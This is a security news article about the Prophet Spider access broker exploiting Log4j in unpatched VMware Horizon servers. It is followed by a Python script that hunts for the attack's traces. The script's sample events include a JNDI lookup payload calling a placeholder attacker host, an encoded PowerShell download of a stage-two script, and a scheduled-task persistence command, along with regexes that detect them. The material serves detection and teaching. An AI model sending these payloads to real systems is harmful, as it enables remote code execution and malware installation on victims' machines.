

Log4j continues to be seen as the main vulnerability abused in malware infections, crypto mining and more. Recently, an initial access broker group dubbed Prophet Spider has been spotted abusing the Log4j vulnerability to gain access to victim networks. Although VMware already released a patch for its Horizon servers in December, many users have not yet updated their systems, leaving them at risk of a Log4j exploit attack.

As stated by a VMware spokesperson, VMware Horizon products remain vulnerable to the critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the patch described in VMSA 2021-0028, which was first published on Dec. The advisory, published on the VMware security advisory page, is updated regularly with new information. The UK's National Health Service (NHS) warned last month that hackers were attempting to exploit a Log4j vulnerability in VMware Horizon servers to establish web shells, allowing attackers to distribute malware and ransomware, steal sensitive information, and carry out other malicious attacks.

Although a few groups have been observed targeting this vulnerability, one group stands out: Prophet Spider. They are categorized as an Initial Access Group (IAG). An IAG will typically compromise hosts so that it can sell access later, and Prophet Spider is known to sell access specifically for targeted ransomware attacks. Their attack patterns (tactics, techniques and procedures, TTPs) have been identified by the researchers at BlackBerry Research & Intelligence as well as its Incident Response (IR) teams.

The first stage of the attack is to abuse the JNDI lookups exposed by Log4j 2.0-2.16 to get the target system to execute a Base64-encoded PowerShell script. The encoded portion contains the strings used to download the payload. In most cases the attackers were observed installing crypto miners, although other malicious software and tools are possible, including ransomware. The most common persistence mechanism was a scheduled task created on the targeted system via a script. For more stealthy attacks, the attackers would leverage a webshell to maintain control over the system.

The Log4j/Log4Shell vulnerability, with its ease of exploitation and the flexibility of the payloads an attacker can push, is still a serious concern, as many organizations are still not patching their known vulnerable systems. On top of this we are (still) seeing exposed VMware Horizon servers, as well as other hosts that are known to still be vulnerable to this exploit. This is despite massive efforts on the part of the security industry to respond to the original 0-day.
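The attack chain described above leaves three artefacts a defender can hunt for: a JNDI lookup string in request data that reaches Log4j, a PowerShell process started with a Base64-encoded command that carries the download strings, and a scheduled task created for persistence. The following script is an added example written for this page, not code from BlackBerry or the article's authors. It scans constructed sample events (a web access log line, a process-creation record and a scheduled-task command line, all with `example.invalid` placeholder hosts) and decodes the encoded PowerShell so the download URL is visible to the analyst; the regexes, event format and `Finding` type are this example's own assumptions.

```python
import base64
import re
from dataclasses import dataclass

# Log4j JNDI lookup string, e.g. ${jndi:ldap://host:1389/a}; any scheme is flagged.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:([^}]*)\}", re.IGNORECASE)

# powershell ... -EncodedCommand <base64> (also the -enc / -e short forms).
ENC_PS_RE = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE | re.DOTALL,
)

# Scheduled-task creation from the command line (the persistence step in the article).
SCHTASKS_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.IGNORECASE)


@dataclass
class Finding:
    source: str   # which event the finding came from (assumed event label)
    kind: str     # jndi_lookup | encoded_powershell | scheduled_task_created
    detail: str   # what the analyst needs to see first


def find_jndi_lookups(text):
    """Return (scheme, target) for every JNDI lookup string found in text."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_RE.finditer(text)]


def decode_encoded_powershell(cmdline):
    """Return the decoded script if cmdline runs PowerShell with an encoded command.
    PowerShell expects Base64 of UTF-16LE text; anything else returns None."""
    m = ENC_PS_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text):
    return re.findall(r"https?://[^\s'\"<>]+", text, re.IGNORECASE)


def scan_events(events):
    """events: iterable of (source, text). Returns findings in event order."""
    findings = []
    for source, text in events:
        for scheme, target in find_jndi_lookups(text):
            findings.append(Finding(source, "jndi_lookup", f"{scheme}:{target}"))
        script = decode_encoded_powershell(text)
        if script is not None:
            urls = extract_urls(script)
            findings.append(Finding(source, "encoded_powershell",
                                    "; ".join(urls) if urls else script.strip()))
        if SCHTASKS_RE.search(text):
            findings.append(Finding(source, "scheduled_task_created", text.strip()))
    return findings


# Constructed sample data: the encoded command is built here so the sample is
# self-contained; in a real hunt the Base64 blob comes from the process log.
_STAGE2 = "Invoke-WebRequest -Uri http://payload.example.invalid/stage2.ps1 -OutFile $env:TEMP\\s.ps1"
_ENC = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ("access.log", '10.0.0.5 - - [10/Jan/2022:13:01:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
                   '"${jndi:ldap://attacker.example.invalid:1389/a}"'),
    ("access.log", '10.0.0.9 - - [10/Jan/2022:13:01:25 +0000] "GET /index.html HTTP/1.1" 200 88 "-" "Mozilla/5.0"'),
    ("sysmon", "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
               f"CommandLine: powershell.exe -nop -w hidden -enc {_ENC}"),
    ("sysmon", 'CommandLine: schtasks.exe /create /tn "Updater" /tr "powershell.exe -File C:\\Users\\Public\\u.ps1" /sc onlogon'),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.source}] {f.kind}: {f.detail}")
```

The benign access-log line produces no finding, and the decoded script is reduced to its URLs so the analyst sees the download destination rather than the full command. Matching `${jndi:` literally is the first, cheapest check; in a real deployment it belongs alongside the vendor's own detections and a version inventory of the Log4j jars in use.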
